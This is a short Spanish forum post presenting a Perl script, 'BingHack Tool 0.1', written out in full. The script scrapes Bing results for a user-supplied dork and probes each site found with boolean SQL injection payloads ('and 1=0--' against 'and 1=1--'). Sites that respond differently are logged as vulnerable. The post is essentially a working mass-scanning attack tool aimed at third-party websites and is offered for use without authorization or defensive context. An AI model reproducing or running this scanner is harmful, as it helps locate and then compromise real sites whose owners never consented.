[Perl] BingHack Tool 0.1

Un simple script en perl para buscar paginas vulnerables a SQLi usando Bing.

El codigo
Código
#!usr/bin/perl
#BingHack Tool 0.1
#Coded By Doddy H
 
use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);
 
head();
print "\n\n[+] Dork : ";
chomp( my $dork = <stdin> );
print "\n[+] Pages : ";
chomp( my $pags = <stdin> );
print "\n[+] Searching ...\n";
my @urls = bing( $dork, $pags );
print "\n[+] Pages Found : " . int(@urls) . "\n";
print "\n[+] Scanning ...\n\n";
 
for my $pa (@urls) {
    sql($pa);
}
print "\n[+] Finished\n";
 
copyright();
 
sub sql {
    my ( $pass1, $pass2 ) = ( "+", "--" );
    my $page = shift;
 
    my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
    my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
 
    unless ( $testar1 eq $testar2 ) {
        print "[+] SQLI : $page\a\n";
        savefile( "sql-logs.txt", $page );
    }
}
 
sub savefile {
    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1] . "\n";
    close SAVE;
}
 
sub bing {
 
    my ( $a, $b ) = @_;
    for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
        my $code =
          toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
 
        while ( $code =~ /<h3><a href="(.*?)"/mig ) {
            push( @founds, $1 );
        }
    }
    my @founds = repes( cortar(@founds) );
    return @founds;
}
 
sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}
 
sub cortar {
    my @nuevo;
    for (@_) {
        if ( $_ =~ /=/ ) {
            @tengo = split( "=", $_ );
            push( @nuevo, @tengo[0] . "=" );
        }
        else {
            push( @nuevo, $_ );
        }
    }
    return @nuevo;
}
 
sub head {
    print qq(
 
 @@@@   @             @    @              @        @@@@@              @
 @   @                @    @              @          @                @
 @   @                @    @              @          @                @
 @   @  @ @ @@   @@@@ @    @   @@@   @@@  @  @       @     @@@   @@@  @
 @@@@   @ @@  @ @   @ @@@@@@      @ @   @ @ @        @    @   @ @   @ @
 @   @  @ @   @ @   @ @    @   @@@@ @     @@         @    @   @ @   @ @
 @   @  @ @   @ @   @ @    @  @   @ @     @ @        @    @   @ @   @ @
 @   @  @ @   @ @   @ @    @  @   @ @   @ @  @       @    @   @ @   @ @
 @@@@   @ @   @  @@@@ @    @   @@@@  @@@  @   @      @     @@@   @@@  @
                    @                                                  
                @@@@                                                   
 
);
}
 
sub copyright {
    print "\n\n-- == (C) Doddy Hackman 2012\n\n";
    <stdin>;
    exit(1);
}
 
sub toma {
    return $nave->get( $_[0] )->content;
}
 
# The End ?